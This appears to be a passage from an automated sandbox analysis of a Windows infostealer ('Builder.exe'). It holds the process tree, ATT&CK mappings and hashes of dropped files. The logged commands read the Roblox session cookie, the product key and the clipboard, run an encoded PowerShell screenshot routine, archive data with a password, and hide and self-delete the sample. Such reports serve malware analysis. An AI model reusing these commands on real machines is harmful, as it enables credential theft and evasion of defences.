    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:4636
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:924
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:6012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:1356
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Desktop\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3784
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5236
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2316
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:5700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4612
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5884
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4040
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3648
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:6140
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4636
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:5988
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ei0dt3ca\ei0dt3ca.cmdline"
        5⤵
        
        PID:1884
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5485.tmp" "c:\Users\Admin\AppData\Local\Temp\ei0dt3ca\CSC3C014D1D15AF443CA19AB51F833839EB.TMP"
        6⤵
        
        PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2908
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1648
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5600
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4204
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3152
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3608
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2420
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1952
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3196
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5756
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI61242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\PVnzp.zip" *"
    3⤵
    PID:4980
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2952
  - - C:\Users\Admin\AppData\Local\Temp\_MEI61242\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI61242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\PVnzp.zip" *
      4⤵
      Executes dropped EXE
      PID:5416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\Builder.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:6052
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

System Binary Proxy Execution

T1218

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
033b6fe50e15618be3382ed223acac56

SHA1
b54063091a577f792495634c4476d230eaa8e099

SHA256
d1b7cbdcf641b36a54b2cb360ea3da694c3014968692226b1e7ccd10ba7d1f3a

SHA512
45cc54510e8cd1be1088a1453db138ad2a8258027bf8eed1fe757ed2f120f2708da304b21248e1e0d01e2429304d4e5fb4b058b6ab1db146e39082b6a6c912ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17afe23fff4dba819dd8927c84b1e9ab

SHA1
aac9348a011dac054db86daacb01dfab6f60b0b5

SHA256
61aa193348d6532abae63d019441dd3c029985a28cdb46b91996dfe9a59c1c4a

SHA512
6400d3631bd1f01d1210780a5fa9afc2bbad51b4bce8a33a85fcd518cc492e0c065065ac69cc0f81d5b6b02745761ecd3628b699e09861139b59a990a07b76c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7929091636e182abf43c8aebba15b1a8

SHA1
45abd3351b8b69a0af703e9b1cb05551c0abc366

SHA256
deb0ffb05763daabecb14e22cda2d79ed3d4ed330b591b123febf09afb30e04c

SHA512
d1ba9c4fc7a069d78b229cbb2045ef0d26e31e1b15e171b6ae081be681f4b4fc7539fa681ba44e9cd4ac832ae4be948997ba15962dd0b65ce78ffeba63f062fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1EQCmc9fRS.tmp

Filesize
114KB

MD5
77a01c7adc663b567af962d3821371bc

SHA1
b1e34a918ee31301a19b3034c9cc10053dce5f59

SHA256
63c0b9f28974b2dc07db2786bb3267cb62251a38fa8392e101e7dafe5967d715

SHA512
1078e546de9906499003ae7a379b4672bdf6ab1db192a66fbffc423fc532950fb912491c552d02bb3464b5049cceee29e09e8b71605da3e5efbbfc0159eab5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\LiIwIu08Fn.tmp

Filesize
112KB

MD5
780853cddeaee8de70f28a4b255a600b

SHA1
ad7a5da33f7ad12946153c497e990720b09005ed

SHA256
1055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3

SHA512
e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\MpyMIs5w7n.tmp

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
